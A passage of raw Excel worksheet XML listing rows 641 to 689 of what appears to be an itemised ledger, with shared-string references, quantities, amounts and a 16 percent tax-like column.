      </c>
      <c r="C641" s="238" t="s">
        <v>6344</v>
      </c>
      <c r="D641" s="238" t="s">
        <v>6345</v>
      </c>
      <c r="E641" s="238" t="s">
        <v>6319</v>
      </c>
      <c r="F641" s="238" t="s">
        <v>6346</v>
      </c>
      <c r="G641" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H641" s="10">
        <v>3</v>
      </c>
      <c r="I641" s="14">
        <v>369.21</v>
      </c>
      <c r="J641" s="15">
        <v>59.0736</v>
      </c>
      <c r="K641" s="16"/>
    </row>
    <row r="642" spans="2:11">
      <c r="B642" s="9">
        <v>669</v>
      </c>
      <c r="C642" s="238" t="s">
        <v>6347</v>
      </c>
      <c r="D642" s="238" t="s">
        <v>6348</v>
      </c>
      <c r="E642" s="238" t="s">
        <v>6326</v>
      </c>
      <c r="F642" s="238" t="s">
        <v>6349</v>
      </c>
      <c r="G642" s="237" t="s">
        <v>223</v>
      </c>
      <c r="H642" s="10">
        <v>2</v>
      </c>
      <c r="I642" s="14">
        <v>316.24</v>
      </c>
      <c r="J642" s="15">
        <v>50.5984</v>
      </c>
      <c r="K642" s="16"/>
    </row>
    <row r="643" spans="2:11">
      <c r="B643" s="9">
        <v>670</v>
      </c>
      <c r="C643" s="238" t="s">
        <v>6350</v>
      </c>
      <c r="D643" s="238" t="s">
        <v>6351</v>
      </c>
      <c r="E643" s="238" t="s">
        <v>6352</v>
      </c>
      <c r="F643" s="238" t="s">
        <v>2178</v>
      </c>
      <c r="G643" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H643" s="10">
        <v>1</v>
      </c>
      <c r="I643" s="14">
        <v>148.45</v>
      </c>
      <c r="J643" s="15">
        <v>23.752</v>
      </c>
      <c r="K643" s="16"/>
    </row>
    <row r="644" spans="2:11">
      <c r="B644" s="9">
        <v>671</v>
      </c>
      <c r="C644" s="238" t="s">
        <v>6353</v>
      </c>
      <c r="D644" s="238" t="s">
        <v>6332</v>
      </c>
      <c r="E644" s="238" t="s">
        <v>6352</v>
      </c>
      <c r="F644" s="238" t="s">
        <v>1960</v>
      </c>
      <c r="G644" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H644" s="10">
        <v>4</v>
      </c>
      <c r="I644" s="14">
        <v>1412.65</v>
      </c>
      <c r="J644" s="15">
        <v>226.0224</v>
      </c>
      <c r="K644" s="16"/>
    </row>
    <row r="645" spans="2:11">
      <c r="B645" s="9">
        <v>672</v>
      </c>
      <c r="C645" s="238" t="s">
        <v>6354</v>
      </c>
      <c r="D645" s="238" t="s">
        <v>6355</v>
      </c>
      <c r="E645" s="238" t="s">
        <v>6356</v>
      </c>
      <c r="F645" s="238" t="s">
        <v>6355</v>
      </c>
      <c r="G645" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H645" s="10">
        <v>1</v>
      </c>
      <c r="I645" s="14">
        <v>58.12</v>
      </c>
      <c r="J645" s="15">
        <v>9.2992</v>
      </c>
      <c r="K645" s="16"/>
    </row>
    <row r="646" spans="2:11">
      <c r="B646" s="9">
        <v>673</v>
      </c>
      <c r="C646" s="238" t="s">
        <v>6357</v>
      </c>
      <c r="D646" s="238" t="s">
        <v>6332</v>
      </c>
      <c r="E646" s="238" t="s">
        <v>6319</v>
      </c>
      <c r="F646" s="238" t="s">
        <v>6358</v>
      </c>
      <c r="G646" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H646" s="10">
        <v>1</v>
      </c>
      <c r="I646" s="14">
        <v>478.63</v>
      </c>
      <c r="J646" s="15">
        <v>76.5808</v>
      </c>
      <c r="K646" s="16"/>
    </row>
    <row r="647" spans="2:11">
      <c r="B647" s="9">
        <v>674</v>
      </c>
      <c r="C647" s="238" t="s">
        <v>6359</v>
      </c>
      <c r="D647" s="238" t="s">
        <v>6360</v>
      </c>
      <c r="E647" s="238" t="s">
        <v>6361</v>
      </c>
      <c r="F647" s="238" t="s">
        <v>764</v>
      </c>
      <c r="G647" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H647" s="10">
        <v>1</v>
      </c>
      <c r="I647" s="14">
        <v>86.04</v>
      </c>
      <c r="J647" s="15">
        <v>13.7664</v>
      </c>
      <c r="K647" s="16"/>
    </row>
    <row r="648" spans="2:11">
      <c r="B648" s="9">
        <v>675</v>
      </c>
      <c r="C648" s="238" t="s">
        <v>6362</v>
      </c>
      <c r="D648" s="238" t="s">
        <v>6363</v>
      </c>
      <c r="E648" s="238" t="s">
        <v>6364</v>
      </c>
      <c r="F648" s="9"/>
      <c r="G648" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H648" s="10">
        <v>4</v>
      </c>
      <c r="I648" s="14">
        <v>3663.62</v>
      </c>
      <c r="J648" s="15">
        <v>586.1824</v>
      </c>
      <c r="K648" s="16"/>
    </row>
    <row r="649" spans="2:11">
      <c r="B649" s="9">
        <v>676</v>
      </c>
      <c r="C649" s="238" t="s">
        <v>6365</v>
      </c>
      <c r="D649" s="238" t="s">
        <v>6366</v>
      </c>
      <c r="E649" s="238" t="s">
        <v>5377</v>
      </c>
      <c r="F649" s="238" t="s">
        <v>6367</v>
      </c>
      <c r="G649" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H649" s="10">
        <v>26</v>
      </c>
      <c r="I649" s="14">
        <v>161.58</v>
      </c>
      <c r="J649" s="15">
        <v>25.8336</v>
      </c>
      <c r="K649" s="16"/>
    </row>
    <row r="650" spans="2:11">
      <c r="B650" s="9">
        <v>677</v>
      </c>
      <c r="C650" s="238" t="s">
        <v>6368</v>
      </c>
      <c r="D650" s="238" t="s">
        <v>6369</v>
      </c>
      <c r="E650" s="238" t="s">
        <v>6370</v>
      </c>
      <c r="F650" s="238" t="s">
        <v>6371</v>
      </c>
      <c r="G650" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H650" s="10">
        <v>12</v>
      </c>
      <c r="I650" s="14">
        <v>5128.23</v>
      </c>
      <c r="J650" s="15">
        <v>820.512</v>
      </c>
      <c r="K650" s="16"/>
    </row>
    <row r="651" spans="2:11">
      <c r="B651" s="9">
        <v>678</v>
      </c>
      <c r="C651" s="238" t="s">
        <v>6372</v>
      </c>
      <c r="D651" s="238" t="s">
        <v>6373</v>
      </c>
      <c r="E651" s="238" t="s">
        <v>6374</v>
      </c>
      <c r="F651" s="238" t="s">
        <v>6375</v>
      </c>
      <c r="G651" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H651" s="10">
        <v>6</v>
      </c>
      <c r="I651" s="14">
        <v>1589.74</v>
      </c>
      <c r="J651" s="15">
        <v>254.3616</v>
      </c>
      <c r="K651" s="16"/>
    </row>
    <row r="652" spans="2:11">
      <c r="B652" s="9">
        <v>679</v>
      </c>
      <c r="C652" s="238" t="s">
        <v>6376</v>
      </c>
      <c r="D652" s="238" t="s">
        <v>6377</v>
      </c>
      <c r="E652" s="238" t="s">
        <v>6378</v>
      </c>
      <c r="F652" s="9"/>
      <c r="G652" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H652" s="10">
        <v>1</v>
      </c>
      <c r="I652" s="14">
        <v>94.62</v>
      </c>
      <c r="J652" s="15">
        <v>15.1392</v>
      </c>
      <c r="K652" s="16"/>
    </row>
    <row r="653" spans="2:11">
      <c r="B653" s="9">
        <v>680</v>
      </c>
      <c r="C653" s="238" t="s">
        <v>6379</v>
      </c>
      <c r="D653" s="238" t="s">
        <v>6380</v>
      </c>
      <c r="E653" s="238" t="s">
        <v>5377</v>
      </c>
      <c r="F653" s="238" t="s">
        <v>6381</v>
      </c>
      <c r="G653" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H653" s="10">
        <v>3</v>
      </c>
      <c r="I653" s="14">
        <v>435.9</v>
      </c>
      <c r="J653" s="15">
        <v>69.744</v>
      </c>
      <c r="K653" s="16"/>
    </row>
    <row r="654" spans="2:11">
      <c r="B654" s="9">
        <v>681</v>
      </c>
      <c r="C654" s="238" t="s">
        <v>6382</v>
      </c>
      <c r="D654" s="238" t="s">
        <v>6383</v>
      </c>
      <c r="E654" s="238" t="s">
        <v>5377</v>
      </c>
      <c r="F654" s="238" t="s">
        <v>6375</v>
      </c>
      <c r="G654" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H654" s="10">
        <v>11</v>
      </c>
      <c r="I654" s="14">
        <v>611.08</v>
      </c>
      <c r="J654" s="15">
        <v>97.768</v>
      </c>
      <c r="K654" s="16"/>
    </row>
    <row r="655" spans="2:11">
      <c r="B655" s="9">
        <v>682</v>
      </c>
      <c r="C655" s="238" t="s">
        <v>6384</v>
      </c>
      <c r="D655" s="238" t="s">
        <v>6385</v>
      </c>
      <c r="E655" s="238" t="s">
        <v>5377</v>
      </c>
      <c r="F655" s="238" t="s">
        <v>6386</v>
      </c>
      <c r="G655" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H655" s="10">
        <v>1</v>
      </c>
      <c r="I655" s="14">
        <v>4.71</v>
      </c>
      <c r="J655" s="15">
        <v>0.7536</v>
      </c>
      <c r="K655" s="16"/>
    </row>
    <row r="656" spans="2:11">
      <c r="B656" s="9">
        <v>683</v>
      </c>
      <c r="C656" s="238" t="s">
        <v>6387</v>
      </c>
      <c r="D656" s="238" t="s">
        <v>6388</v>
      </c>
      <c r="E656" s="238" t="s">
        <v>5377</v>
      </c>
      <c r="F656" s="238" t="s">
        <v>6389</v>
      </c>
      <c r="G656" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H656" s="10">
        <v>1</v>
      </c>
      <c r="I656" s="14">
        <v>1824.95</v>
      </c>
      <c r="J656" s="15">
        <v>291.992</v>
      </c>
      <c r="K656" s="16"/>
    </row>
    <row r="657" spans="2:11">
      <c r="B657" s="9">
        <v>684</v>
      </c>
      <c r="C657" s="238" t="s">
        <v>6390</v>
      </c>
      <c r="D657" s="238" t="s">
        <v>6391</v>
      </c>
      <c r="E657" s="238" t="s">
        <v>6392</v>
      </c>
      <c r="F657" s="238" t="s">
        <v>6393</v>
      </c>
      <c r="G657" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H657" s="10">
        <v>1</v>
      </c>
      <c r="I657" s="14">
        <v>8.12</v>
      </c>
      <c r="J657" s="15">
        <v>1.2992</v>
      </c>
      <c r="K657" s="16"/>
    </row>
    <row r="658" spans="2:11">
      <c r="B658" s="9">
        <v>685</v>
      </c>
      <c r="C658" s="238" t="s">
        <v>6394</v>
      </c>
      <c r="D658" s="238" t="s">
        <v>6395</v>
      </c>
      <c r="E658" s="238" t="s">
        <v>6392</v>
      </c>
      <c r="F658" s="238" t="s">
        <v>6396</v>
      </c>
      <c r="G658" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H658" s="10">
        <v>1</v>
      </c>
      <c r="I658" s="14">
        <v>36.28</v>
      </c>
      <c r="J658" s="15">
        <v>5.8048</v>
      </c>
      <c r="K658" s="16"/>
    </row>
    <row r="659" spans="2:11">
      <c r="B659" s="9">
        <v>686</v>
      </c>
      <c r="C659" s="238" t="s">
        <v>6397</v>
      </c>
      <c r="D659" s="238" t="s">
        <v>6398</v>
      </c>
      <c r="E659" s="238" t="s">
        <v>6392</v>
      </c>
      <c r="F659" s="238" t="s">
        <v>6399</v>
      </c>
      <c r="G659" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H659" s="10">
        <v>2</v>
      </c>
      <c r="I659" s="14">
        <v>1811.96</v>
      </c>
      <c r="J659" s="15">
        <v>289.9136</v>
      </c>
      <c r="K659" s="16"/>
    </row>
    <row r="660" spans="2:11">
      <c r="B660" s="9">
        <v>687</v>
      </c>
      <c r="C660" s="238" t="s">
        <v>6400</v>
      </c>
      <c r="D660" s="238" t="s">
        <v>6401</v>
      </c>
      <c r="E660" s="238" t="s">
        <v>6392</v>
      </c>
      <c r="F660" s="238" t="s">
        <v>6402</v>
      </c>
      <c r="G660" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H660" s="10">
        <v>2</v>
      </c>
      <c r="I660" s="14">
        <v>991.45</v>
      </c>
      <c r="J660" s="15">
        <v>158.6336</v>
      </c>
      <c r="K660" s="16"/>
    </row>
    <row r="661" spans="2:11">
      <c r="B661" s="9">
        <v>688</v>
      </c>
      <c r="C661" s="238" t="s">
        <v>6403</v>
      </c>
      <c r="D661" s="238" t="s">
        <v>6385</v>
      </c>
      <c r="E661" s="238" t="s">
        <v>6404</v>
      </c>
      <c r="F661" s="238" t="s">
        <v>6405</v>
      </c>
      <c r="G661" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H661" s="10">
        <v>3</v>
      </c>
      <c r="I661" s="14">
        <v>4598.03</v>
      </c>
      <c r="J661" s="15">
        <v>735.6864</v>
      </c>
      <c r="K661" s="16"/>
    </row>
    <row r="662" spans="2:11">
      <c r="B662" s="9">
        <v>689</v>
      </c>
      <c r="C662" s="238" t="s">
        <v>6406</v>
      </c>
      <c r="D662" s="238" t="s">
        <v>6395</v>
      </c>
      <c r="E662" s="238" t="s">
        <v>6407</v>
      </c>
      <c r="F662" s="238" t="s">
        <v>6408</v>
      </c>
      <c r="G662" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H662" s="10">
        <v>1</v>
      </c>
      <c r="I662" s="14">
        <v>85.86</v>
      </c>
      <c r="J662" s="15">
        <v>13.7376</v>
      </c>
      <c r="K662" s="16"/>
    </row>
    <row r="663" spans="2:11">
      <c r="B663" s="9">
        <v>690</v>
      </c>
      <c r="C663" s="238" t="s">
        <v>6409</v>
      </c>
      <c r="D663" s="238" t="s">
        <v>6395</v>
      </c>
      <c r="E663" s="238" t="s">
        <v>6410</v>
      </c>
      <c r="F663" s="238" t="s">
        <v>6411</v>
      </c>
      <c r="G663" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H663" s="10">
        <v>1</v>
      </c>
      <c r="I663" s="14">
        <v>72.65</v>
      </c>
      <c r="J663" s="15">
        <v>11.624</v>
      </c>
      <c r="K663" s="16"/>
    </row>
    <row r="664" spans="2:11">
      <c r="B664" s="9">
        <v>691</v>
      </c>
      <c r="C664" s="238" t="s">
        <v>6412</v>
      </c>
      <c r="D664" s="238" t="s">
        <v>6395</v>
      </c>
      <c r="E664" s="238" t="s">
        <v>6410</v>
      </c>
      <c r="F664" s="238" t="s">
        <v>6413</v>
      </c>
      <c r="G664" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H664" s="10">
        <v>2</v>
      </c>
      <c r="I664" s="14">
        <v>478.63</v>
      </c>
      <c r="J664" s="15">
        <v>76.5824</v>
      </c>
      <c r="K664" s="16"/>
    </row>
    <row r="665" spans="2:11">
      <c r="B665" s="9">
        <v>692</v>
      </c>
      <c r="C665" s="238" t="s">
        <v>6414</v>
      </c>
      <c r="D665" s="238" t="s">
        <v>6415</v>
      </c>
      <c r="E665" s="238" t="s">
        <v>6416</v>
      </c>
      <c r="F665" s="238" t="s">
        <v>6417</v>
      </c>
      <c r="G665" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H665" s="10">
        <v>2</v>
      </c>
      <c r="I665" s="14">
        <v>786.32</v>
      </c>
      <c r="J665" s="15">
        <v>125.8112</v>
      </c>
      <c r="K665" s="16"/>
    </row>
    <row r="666" spans="2:11">
      <c r="B666" s="9">
        <v>693</v>
      </c>
      <c r="C666" s="238" t="s">
        <v>6418</v>
      </c>
      <c r="D666" s="238" t="s">
        <v>6419</v>
      </c>
      <c r="E666" s="238" t="s">
        <v>6420</v>
      </c>
      <c r="F666" s="238" t="s">
        <v>764</v>
      </c>
      <c r="G666" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H666" s="10">
        <v>2</v>
      </c>
      <c r="I666" s="14">
        <v>769.22</v>
      </c>
      <c r="J666" s="15">
        <v>123.0752</v>
      </c>
      <c r="K666" s="16"/>
    </row>
    <row r="667" spans="2:11">
      <c r="B667" s="9">
        <v>694</v>
      </c>
      <c r="C667" s="238" t="s">
        <v>6421</v>
      </c>
      <c r="D667" s="238" t="s">
        <v>6422</v>
      </c>
      <c r="E667" s="238" t="s">
        <v>6423</v>
      </c>
      <c r="F667" s="238" t="s">
        <v>6424</v>
      </c>
      <c r="G667" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H667" s="10">
        <v>1</v>
      </c>
      <c r="I667" s="14">
        <v>1014.53</v>
      </c>
      <c r="J667" s="15">
        <v>162.3248</v>
      </c>
      <c r="K667" s="16"/>
    </row>
    <row r="668" spans="2:11">
      <c r="B668" s="9">
        <v>695</v>
      </c>
      <c r="C668" s="238" t="s">
        <v>6425</v>
      </c>
      <c r="D668" s="238" t="s">
        <v>6426</v>
      </c>
      <c r="E668" s="238" t="s">
        <v>6423</v>
      </c>
      <c r="F668" s="238" t="s">
        <v>6427</v>
      </c>
      <c r="G668" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H668" s="10">
        <v>1</v>
      </c>
      <c r="I668" s="14">
        <v>2405.98</v>
      </c>
      <c r="J668" s="15">
        <v>384.9568</v>
      </c>
      <c r="K668" s="16"/>
    </row>
    <row r="669" spans="2:11">
      <c r="B669" s="9">
        <v>696</v>
      </c>
      <c r="C669" s="238" t="s">
        <v>6428</v>
      </c>
      <c r="D669" s="238" t="s">
        <v>6426</v>
      </c>
      <c r="E669" s="238" t="s">
        <v>6416</v>
      </c>
      <c r="F669" s="238" t="s">
        <v>6429</v>
      </c>
      <c r="G669" s="237" t="s">
        <v>223</v>
      </c>
      <c r="H669" s="10">
        <v>1</v>
      </c>
      <c r="I669" s="14">
        <v>3162.39</v>
      </c>
      <c r="J669" s="15">
        <v>505.9824</v>
      </c>
      <c r="K669" s="16"/>
    </row>
    <row r="670" spans="2:11">
      <c r="B670" s="9">
        <v>697</v>
      </c>
      <c r="C670" s="238" t="s">
        <v>6430</v>
      </c>
      <c r="D670" s="238" t="s">
        <v>6426</v>
      </c>
      <c r="E670" s="238" t="s">
        <v>6416</v>
      </c>
      <c r="F670" s="238" t="s">
        <v>1960</v>
      </c>
      <c r="G670" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H670" s="10">
        <v>1</v>
      </c>
      <c r="I670" s="14">
        <v>1008.55</v>
      </c>
      <c r="J670" s="15">
        <v>161.368</v>
      </c>
      <c r="K670" s="16"/>
    </row>
    <row r="671" spans="2:11">
      <c r="B671" s="9">
        <v>698</v>
      </c>
      <c r="C671" s="238" t="s">
        <v>6431</v>
      </c>
      <c r="D671" s="238" t="s">
        <v>6432</v>
      </c>
      <c r="E671" s="238" t="s">
        <v>6433</v>
      </c>
      <c r="F671" s="238" t="s">
        <v>6434</v>
      </c>
      <c r="G671" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H671" s="10">
        <v>3</v>
      </c>
      <c r="I671" s="17"/>
      <c r="J671" s="15">
        <v>0</v>
      </c>
      <c r="K671" s="16"/>
    </row>
    <row r="672" spans="2:11">
      <c r="B672" s="9">
        <v>699</v>
      </c>
      <c r="C672" s="238" t="s">
        <v>6435</v>
      </c>
      <c r="D672" s="9"/>
      <c r="E672" s="238" t="s">
        <v>6433</v>
      </c>
      <c r="F672" s="238" t="s">
        <v>2187</v>
      </c>
      <c r="G672" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H672" s="10">
        <v>1</v>
      </c>
      <c r="I672" s="14">
        <v>333.33</v>
      </c>
      <c r="J672" s="15">
        <v>53.3328</v>
      </c>
      <c r="K672" s="16"/>
    </row>
    <row r="673" spans="2:11">
      <c r="B673" s="9">
        <v>700</v>
      </c>
      <c r="C673" s="238" t="s">
        <v>6436</v>
      </c>
      <c r="D673" s="238" t="s">
        <v>6432</v>
      </c>
      <c r="E673" s="238" t="s">
        <v>6433</v>
      </c>
      <c r="F673" s="238" t="s">
        <v>6437</v>
      </c>
      <c r="G673" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H673" s="10">
        <v>1</v>
      </c>
      <c r="I673" s="14">
        <v>4829.06</v>
      </c>
      <c r="J673" s="15">
        <v>772.6496</v>
      </c>
      <c r="K673" s="16"/>
    </row>
    <row r="674" spans="2:11">
      <c r="B674" s="9">
        <v>701</v>
      </c>
      <c r="C674" s="238" t="s">
        <v>6438</v>
      </c>
      <c r="D674" s="238" t="s">
        <v>6432</v>
      </c>
      <c r="E674" s="238" t="s">
        <v>6433</v>
      </c>
      <c r="F674" s="238" t="s">
        <v>6439</v>
      </c>
      <c r="G674" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H674" s="10">
        <v>1</v>
      </c>
      <c r="I674" s="14">
        <v>1068.38</v>
      </c>
      <c r="J674" s="15">
        <v>170.9408</v>
      </c>
      <c r="K674" s="16"/>
    </row>
    <row r="675" spans="2:11">
      <c r="B675" s="9">
        <v>702</v>
      </c>
      <c r="C675" s="238" t="s">
        <v>6440</v>
      </c>
      <c r="D675" s="238" t="s">
        <v>6432</v>
      </c>
      <c r="E675" s="238" t="s">
        <v>6433</v>
      </c>
      <c r="F675" s="238" t="s">
        <v>6441</v>
      </c>
      <c r="G675" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H675" s="10">
        <v>6</v>
      </c>
      <c r="I675" s="14">
        <v>2786.32</v>
      </c>
      <c r="J675" s="15">
        <v>445.8144</v>
      </c>
      <c r="K675" s="16"/>
    </row>
    <row r="676" spans="2:11">
      <c r="B676" s="9">
        <v>703</v>
      </c>
      <c r="C676" s="238" t="s">
        <v>6442</v>
      </c>
      <c r="D676" s="238" t="s">
        <v>6443</v>
      </c>
      <c r="E676" s="238" t="s">
        <v>6433</v>
      </c>
      <c r="F676" s="238" t="s">
        <v>6444</v>
      </c>
      <c r="G676" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H676" s="10">
        <v>4</v>
      </c>
      <c r="I676" s="14">
        <v>2697.44</v>
      </c>
      <c r="J676" s="15">
        <v>431.5904</v>
      </c>
      <c r="K676" s="16"/>
    </row>
    <row r="677" spans="2:11">
      <c r="B677" s="9">
        <v>704</v>
      </c>
      <c r="C677" s="238" t="s">
        <v>6445</v>
      </c>
      <c r="D677" s="238" t="s">
        <v>6446</v>
      </c>
      <c r="E677" s="238" t="s">
        <v>6433</v>
      </c>
      <c r="F677" s="238" t="s">
        <v>6447</v>
      </c>
      <c r="G677" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H677" s="10">
        <v>2</v>
      </c>
      <c r="I677" s="14">
        <v>1880.34</v>
      </c>
      <c r="J677" s="15">
        <v>300.8544</v>
      </c>
      <c r="K677" s="16"/>
    </row>
    <row r="678" spans="2:11">
      <c r="B678" s="9">
        <v>705</v>
      </c>
      <c r="C678" s="238" t="s">
        <v>6448</v>
      </c>
      <c r="D678" s="238" t="s">
        <v>6449</v>
      </c>
      <c r="E678" s="238" t="s">
        <v>6433</v>
      </c>
      <c r="F678" s="238" t="s">
        <v>6450</v>
      </c>
      <c r="G678" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H678" s="10">
        <v>2</v>
      </c>
      <c r="I678" s="14">
        <v>4871.79</v>
      </c>
      <c r="J678" s="15">
        <v>779.488</v>
      </c>
      <c r="K678" s="16"/>
    </row>
    <row r="679" spans="2:11">
      <c r="B679" s="9">
        <v>706</v>
      </c>
      <c r="C679" s="238" t="s">
        <v>6451</v>
      </c>
      <c r="D679" s="238" t="s">
        <v>6452</v>
      </c>
      <c r="E679" s="238" t="s">
        <v>6433</v>
      </c>
      <c r="F679" s="238" t="s">
        <v>6453</v>
      </c>
      <c r="G679" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H679" s="10">
        <v>2</v>
      </c>
      <c r="I679" s="14">
        <v>21529.91</v>
      </c>
      <c r="J679" s="15">
        <v>3444.7872</v>
      </c>
      <c r="K679" s="16"/>
    </row>
    <row r="680" spans="2:11">
      <c r="B680" s="9">
        <v>707</v>
      </c>
      <c r="C680" s="238" t="s">
        <v>6454</v>
      </c>
      <c r="D680" s="238" t="s">
        <v>6455</v>
      </c>
      <c r="E680" s="238" t="s">
        <v>6433</v>
      </c>
      <c r="F680" s="238" t="s">
        <v>6456</v>
      </c>
      <c r="G680" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H680" s="10">
        <v>1</v>
      </c>
      <c r="I680" s="14">
        <v>4141.03</v>
      </c>
      <c r="J680" s="15">
        <v>662.5648</v>
      </c>
      <c r="K680" s="16"/>
    </row>
    <row r="681" spans="2:11">
      <c r="B681" s="9">
        <v>708</v>
      </c>
      <c r="C681" s="238" t="s">
        <v>6457</v>
      </c>
      <c r="D681" s="238" t="s">
        <v>6432</v>
      </c>
      <c r="E681" s="238" t="s">
        <v>6458</v>
      </c>
      <c r="F681" s="238" t="s">
        <v>6459</v>
      </c>
      <c r="G681" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H681" s="10">
        <v>14</v>
      </c>
      <c r="I681" s="14">
        <v>4458.43</v>
      </c>
      <c r="J681" s="15">
        <v>713.3504</v>
      </c>
      <c r="K681" s="16"/>
    </row>
    <row r="682" spans="2:11">
      <c r="B682" s="9">
        <v>709</v>
      </c>
      <c r="C682" s="238" t="s">
        <v>6460</v>
      </c>
      <c r="D682" s="238" t="s">
        <v>6461</v>
      </c>
      <c r="E682" s="238" t="s">
        <v>6462</v>
      </c>
      <c r="F682" s="238" t="s">
        <v>6463</v>
      </c>
      <c r="G682" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H682" s="10">
        <v>2</v>
      </c>
      <c r="I682" s="14">
        <v>794.87</v>
      </c>
      <c r="J682" s="15">
        <v>127.1808</v>
      </c>
      <c r="K682" s="16"/>
    </row>
    <row r="683" spans="2:11">
      <c r="B683" s="9">
        <v>710</v>
      </c>
      <c r="C683" s="238" t="s">
        <v>6464</v>
      </c>
      <c r="D683" s="238" t="s">
        <v>6461</v>
      </c>
      <c r="E683" s="238" t="s">
        <v>6462</v>
      </c>
      <c r="F683" s="238" t="s">
        <v>6465</v>
      </c>
      <c r="G683" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H683" s="10">
        <v>2</v>
      </c>
      <c r="I683" s="14">
        <v>1452.99</v>
      </c>
      <c r="J683" s="15">
        <v>232.48</v>
      </c>
      <c r="K683" s="16"/>
    </row>
    <row r="684" spans="2:11">
      <c r="B684" s="9">
        <v>711</v>
      </c>
      <c r="C684" s="238" t="s">
        <v>6466</v>
      </c>
      <c r="D684" s="238" t="s">
        <v>6461</v>
      </c>
      <c r="E684" s="238" t="s">
        <v>6462</v>
      </c>
      <c r="F684" s="238" t="s">
        <v>6467</v>
      </c>
      <c r="G684" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H684" s="10">
        <v>2</v>
      </c>
      <c r="I684" s="14">
        <v>940.17</v>
      </c>
      <c r="J684" s="15">
        <v>150.4288</v>
      </c>
      <c r="K684" s="16"/>
    </row>
    <row r="685" spans="2:11">
      <c r="B685" s="9">
        <v>712</v>
      </c>
      <c r="C685" s="238" t="s">
        <v>6468</v>
      </c>
      <c r="D685" s="238" t="s">
        <v>6469</v>
      </c>
      <c r="E685" s="238" t="s">
        <v>6420</v>
      </c>
      <c r="F685" s="238" t="s">
        <v>6470</v>
      </c>
      <c r="G685" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H685" s="10">
        <v>3</v>
      </c>
      <c r="I685" s="14">
        <v>19333.33</v>
      </c>
      <c r="J685" s="15">
        <v>3093.3312</v>
      </c>
      <c r="K685" s="16"/>
    </row>
    <row r="686" spans="2:11">
      <c r="B686" s="9">
        <v>713</v>
      </c>
      <c r="C686" s="238" t="s">
        <v>6471</v>
      </c>
      <c r="D686" s="238" t="s">
        <v>6472</v>
      </c>
      <c r="E686" s="238" t="s">
        <v>6420</v>
      </c>
      <c r="F686" s="238" t="s">
        <v>6473</v>
      </c>
      <c r="G686" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H686" s="10">
        <v>1</v>
      </c>
      <c r="I686" s="14">
        <v>169.24</v>
      </c>
      <c r="J686" s="15">
        <v>27.0784</v>
      </c>
      <c r="K686" s="16"/>
    </row>
    <row r="687" spans="2:11">
      <c r="B687" s="9">
        <v>714</v>
      </c>
      <c r="C687" s="238" t="s">
        <v>6474</v>
      </c>
      <c r="D687" s="238" t="s">
        <v>6475</v>
      </c>
      <c r="E687" s="238" t="s">
        <v>6420</v>
      </c>
      <c r="F687" s="238" t="s">
        <v>6476</v>
      </c>
      <c r="G687" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H687" s="10">
        <v>2</v>
      </c>
      <c r="I687" s="14">
        <v>1128.21</v>
      </c>
      <c r="J687" s="15">
        <v>180.5152</v>
      </c>
      <c r="K687" s="16"/>
    </row>
    <row r="688" spans="2:11">
      <c r="B688" s="9">
        <v>715</v>
      </c>
      <c r="C688" s="238" t="s">
        <v>6477</v>
      </c>
      <c r="D688" s="238" t="s">
        <v>6478</v>
      </c>
      <c r="E688" s="238" t="s">
        <v>6479</v>
      </c>
      <c r="F688" s="238" t="s">
        <v>6480</v>
      </c>
      <c r="G688" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H688" s="10">
        <v>5</v>
      </c>
      <c r="I688" s="14">
        <v>1004.27</v>
      </c>
      <c r="J688" s="15">
        <v>160.68</v>
      </c>
      <c r="K688" s="16"/>
    </row>
    <row r="689" spans="2:11">
      <c r="B689" s="9">
        <v>716</v>
      </c>
      <c r="C689" s="238" t="s">
        <v>6481</v>
      </c>
      <c r="D689" s="238" t="s">
        <v>6478</v>
      </c>
      <c r="E689" s="238" t="s">
        <v>6479</v>
      </c>
      <c r="F689" s="238" t="s">
        <v>6482</v>
      </c>
      <c r="G689" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H689" s="10">
        <v>4</v>
      </c>
      <c r="I689" s="14">
        <v>309.81</v>
      </c>
      <c r="J689" s="15">
        <v>49.568</v>
      </c>
      <c r="K689" s="16"/>
    </row>
    <row r="690" spans="2:11">
      <c r="B690" s="9">
        <v>717</v>
      </c>
